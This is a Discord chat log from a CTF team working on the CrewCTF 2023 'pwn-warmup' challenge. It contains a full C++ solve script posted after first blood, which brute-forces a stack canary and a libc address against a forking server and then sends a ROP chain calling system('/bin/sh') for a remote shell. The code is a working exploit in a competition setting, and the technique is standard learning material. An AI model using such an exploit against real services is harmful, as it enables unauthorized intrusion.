Project Sekai
🔒 CrewCTF 2023 / 🩸-pwn-warmup
Sutx pinned a message to this channel. 07/07/2023 10:58 PM
@nyancat0131 wants to collaborate 🤝
23:03
@Surg wants to collaborate 🤝
canary brute force.
@Zafirr wants to collaborate 🤝
dead.
00:59
Ariwtf
00:59
remote dead.
nyancat0131 07/08/2023 1:09 AM
brute force will take long.
01:09
i solved it on local
01:09
i even rented gce near the server
01:09
but still slow
if it's too slow maybe need to ticket and tell them it's fucking slow
nyancat0131 07/08/2023 1:30 AM
i dont like this ctf already
01:30
i have only managed to get 1/2 of the canary
01:30
and even after that i have to brute 4.5 more bytes of the libc
01:30
my god
i recall piers doing 16 multi threads brute on some pwn only he solved msfrog
01:31
2^32 brute or sth
01:31
so slow
nyancat0131 07/08/2023 1:31 AM
this one is just 256 * 11.5
01:31
multithread then, ez
nyancat0131 07/08/2023 1:35 AM
it's faster now
01:35
seems not many teams trying to brute it
01:35
the timeout is 1 hr.
01:36
i hope i can get it without coding multithread
01:36
msfrog
multithread=spawn 8 solve.py msfrog
nyancat0131 07/08/2023 1:36 AM
need to sync tho
01:36
cuz it's not like pinning one offset
its not like bruting address?
01:36
ah ok
nyancat0131 07/08/2023 1:37 AM
it's byte-by-byte brute cuz it uses fork
nyancat0131 07/08/2023 1:59 AM
lol the server is so slow
02:00
i think because so many ppl try to multithread it
02:00
now my single connection struggles to even send data
infra is just broken i think
02:00
v2 has also been down
02:00
for like 20 minutes
nyancat0131 07/08/2023 2:00 AM
they should not build brute force chall if they don't know about scaling.
02:01
that's y hacker should also learn software dev.
02:01
their captain is quite young
02:01
still 18/19 i think
nyancat0131 07/08/2023 2:12 AM
server seems dead to me...
02:13
old instance is dead
02:13
and i cannot spawn new connection either
02:14
it seems like they run out of port
ip changed
02:25
34.76.152.107
02:25
to that
@Violin wants to collaborate 🤝
it's rebooted, conn seems to work now
nyancat0131 07/08/2023 2:36 AM
okay i'm using 4 threads for canary
nyancat0131 used /ctf submit
🩸 Well done, you got first blood!
nyancat0131 07/08/2023 2:43 AM
shitty challenge i must say
> nyancat0131: shitty challenge i must say
What was your final script?
nyancat0131 07/08/2023 2:44 AM
```cpp
// Posted solve script. framework.h is nyancat0131's own helper library (described
// later in the log as "still evolving" and not shared here): TCPSocket, LogVar, LogHex,
// Pack, Unpack and HexDump come from it. The remaining headers below are the standard
// ones the script actually needs.
#include "framework.h"
#include <cstdint>      // uint64_t
#include <cstdlib>      // atoi, exit
#include <string>
#include <sys/mman.h>   // mmap
#include <thread>
#include <unistd.h>     // fork, sleep, pid_t
#include <utility>
#include <vector>

static constexpr char host[] = "34.76.152.107";

// Result slot shared between the forked workers and the parent (MAP_SHARED mmap):
// -1 = not found yet, otherwise the byte value a worker confirmed.
int *shared;

// Worker: try candidate values j in [l, r) for the next unknown canary byte.
// The target fork()s per connection, so every child has the same canary and it can be
// recovered one byte at a time (256 guesses per byte instead of 2^56). The payload ends
// at the candidate byte, so saved rbp and the return address are left intact. A second
// RecvLine() that throws (no second line before the connection closes) is taken as
// "byte correct"; with a wrong byte the service evidently emits a second line
// before dying.
void canary(std::string payload, int port, int l, int r) {
    payload.push_back('\x00');
    for (int j = l; j < r && *shared == -1; ++j) {
        payload.back() = j;
        auto rr = TCPSocket(host, port);
        rr.Send(payload);
        rr.RecvLine();
        try {
            rr.RecvLine();
        } catch (...) {
            *shared = j;
            break;
        }
    }
    exit(0);  // worker is a forked child: never return into main()
}

int main() {
    // The launcher on port 17012 hands out the instance port.
    auto r = TCPSocket(host, 17012);
    r.RecvUntil("port ");
    int port = atoi(r.RecvUntil(" ").c_str());

    // 57 zero bytes: everything up to and including the canary's low byte,
    // which is always 0x00 on x86-64 glibc.
    std::string payload(57, '\x00');

    // Remaining 7 canary bytes, 4 workers x 64 candidates each per byte.
    for (int i = 0; i < 7; ++i) {
        LogVar(i);
        shared = reinterpret_cast<int *>(mmap(nullptr, sizeof(int), PROT_READ | PROT_WRITE,
                                              MAP_SHARED | MAP_ANONYMOUS, -1, 0));
        *shared = -1;
        pid_t p[4];
        p[0] = fork(); if (p[0] == 0) canary(payload, port, 0, 64);
        p[1] = fork(); if (p[1] == 0) canary(payload, port, 64, 128);
        p[2] = fork(); if (p[2] == 0) canary(payload, port, 128, 192);
        p[3] = fork(); if (p[3] == 0) canary(payload, port, 192, 256);
        while (*shared == -1) sleep(0);  // spin until one worker reports a hit
        payload.push_back(*shared);
    }

    // Skip the saved rbp, then brute the saved return address (into libc) byte by byte.
    // Its low byte is 0x76 (from the 0x23a76 offset used below) and the low nibble of
    // the next byte is 0xA, so i == 0 only tries the 16 high nibbles; the top bytes
    // 0x00007f are the usual top of a libc mapping and are not guessed at all.
    payload.resize(payload.size() + 8);
    payload.push_back('\x76');
    for (int i = 0; i < 4; ++i) {
        LogVar(i);
        payload.push_back('\x00');
        int start = 0, step = 1;
        if (i == 0) { start = 0xA; step = 0x10; }
        for (int j = start; j < 256; j += step) {
            payload.back() = j;
            auto rr = TCPSocket(host, port);
            rr.Send(payload);
            rr.RecvLine();
            try {
                // a correct byte is recognised by a second line starting with 'T'
                if (rr.RecvLine()[0] == 'T') break;
            } catch (...) {
            }
        }
    }
    payload.push_back('\x7f');
    payload.push_back('\x00');
    payload.push_back('\x00');

    // Bytes 72.. of the payload now hold the recovered return address; derive libc base.
    auto libc = Unpack<uint64_t>(payload.substr(72)) - 0x23a76;
    LogHex(libc);

    // Swap the recovered return address for a system("/bin/sh") chain
    // (the leading ret is a stack-alignment gadget).
    payload.resize(payload.size() - 8);
    payload += Pack(libc + 0x22fd9);   // ret
    payload += Pack(libc + 0x240e5);   // pop rdi ; ret
    payload += Pack(libc + 0x1B51D2);  // /bin/sh
    payload += Pack(libc + 0x4EBF0);   // system
    HexDump(payload);

    auto rr = TCPSocket(host, port);
    rr.Send(payload);
    rr.Interactive();
}
```
02:44
i use c++ but should translate to python pretty the same
damn c++ pwn script
02:45
that's rare
Bouta say
share framework.h?
damn c++ solve
But multithreading just... is awful in python
In the sense that you cant.
nyancat0131 07/08/2023 2:46 AM
it's still evolving though.
02:46
so it's not the final version of my framework
"Warmup"
nyancat0131 07/08/2023 2:48 AM
fork() is just too nice under linux.